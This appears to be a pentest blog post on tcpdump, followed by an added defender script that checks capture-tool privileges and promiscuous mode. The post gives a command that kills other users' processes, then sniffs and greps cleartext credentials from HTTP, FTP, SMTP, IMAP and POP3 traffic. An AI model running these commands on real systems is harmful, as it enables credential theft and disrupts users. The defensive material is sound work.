TCP Dump

tcpdump is a powerful command-line packet analyzer, built on libpcap, a portable C/C++ library for network traffic capture.

Why Do We Care?

Passive eavesdropping, and privilege escalation from a low-privilege user.

About Passive Eavesdropping

  • Kill processes and make their users re-auth
  • Listen for clear text credentials
  • Find new hosts and endpoints
  • Surveillance

Pentests

One of my favourite things to do on tests is to kill processes that I know other users/admins are using and that authenticate over protocols I can either downgrade or see in plaintext. This method is highly effective, since the user has to re-auth, giving you the credentials you need. I can’t tell you how many times I have priv. esc’d with only tcpdump.

Example:

Here we sniff traffic as a low-privilege user, open the capture in Wireshark, follow the TCP stream and voilà, we have the password 🙂

DC info and the password are masked, as this example is taken from an active CTF-style box.

Tactical Command

tcpdump -l -A port http or port ftp or port smtp or port imap or port pop3 | grep -Ei 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B5 -A5

oracle@box#: ps
1392 process-to-kill
oracle@box#: kill -9 1392
oracle@box#: tcpdump -l -A port http or port ftp or port smtp or port imap or port pop3 | grep -Ei 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B5 -A5
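As an added defender-side counterpart to the commands above (example script, not part of the original post), this audit asks the two questions the post raises for a blue team: could a non-root user on this host run a capture tool at all, and has any interface been switched into promiscuous mode (tcpdump does that by default unless run with -p)? The tcpdump/tshark/dumpcap names, the getcap check and the kernel log wording are standard Linux; the sample log lines are constructed.

```sh
#!/bin/sh
# Added defender-side audit, not from the original post. Checks whether a
# low-privilege user could open raw sockets with a capture tool, and whether
# any interface is (or has been) in promiscuous mode. The kernel log lines
# used for the offline demo below are constructed.

IFF_PROMISC=256   # 0x100, the promiscuous flag bit from <linux/if.h>

# iface_is_promisc HEXFLAGS: true if IFF_PROMISC is set in the value read
# from /sys/class/net/<iface>/flags, e.g. "0x1103".
iface_is_promisc() {
    [ $(( $1 & IFF_PROMISC )) -ne 0 ]
}

# promisc_open: read kernel log lines on stdin and print each interface that
# "entered promiscuous mode" without a later "left promiscuous mode".
promisc_open() {
    awk '/entered promiscuous mode/ { for (i = 1; i <= NF; i++) if ($i == "device") open[$(i+1)] = 1 }
         /left promiscuous mode/    { for (i = 1; i <= NF; i++) if ($i == "device") delete open[$(i+1)] }
         END { for (d in open) print d }' | sort
}

# capture_privs BINARY: report a setuid bit or file capabilities that would
# let a low-privilege user capture with this tool (the reason a plain
# "oracle" shell can run tcpdump at all).
capture_privs() {
    path=$(command -v "$1" 2>/dev/null) || return 0
    [ -u "$path" ] && echo "WARN: $path is setuid"
    if command -v getcap >/dev/null 2>&1; then
        getcap "$path" 2>/dev/null | grep -Ei 'cap_net_(raw|admin)' | sed 's/^/WARN: file capability on /'
    fi
    return 0
}

# Constructed sample: eth0 was sniffed and released, eth1 is still open.
SAMPLE_KLOG='[  812.10] device eth0 entered promiscuous mode
[  990.42] device eth0 left promiscuous mode
[ 1201.77] device eth1 entered promiscuous mode'
echo "demo (constructed log): still promiscuous -> $(printf '%s\n' "$SAMPLE_KLOG" | promisc_open)"

# Live checks; they only find anything on a Linux host and stay quiet elsewhere.
for bin in tcpdump tshark dumpcap; do capture_privs "$bin"; done
for f in /sys/class/net/*/flags; do
    [ -r "$f" ] || continue
    iface_is_promisc "$(cat "$f")" && echo "WARN: $(basename "$(dirname "$f")") is in promiscuous mode"
done
if command -v journalctl >/dev/null 2>&1; then
    journalctl -k --no-pager 2>/dev/null | promisc_open | sed 's/^/WARN: promiscuous since boot: /'
fi
```

A file capability or setuid bit on a capture binary is the usual way the low-privilege scenario in the post becomes possible; removing it (and running captures only through sudo) closes that path, while the kernel "entered promiscuous mode" message is the cheapest host-side signal that someone started sniffing.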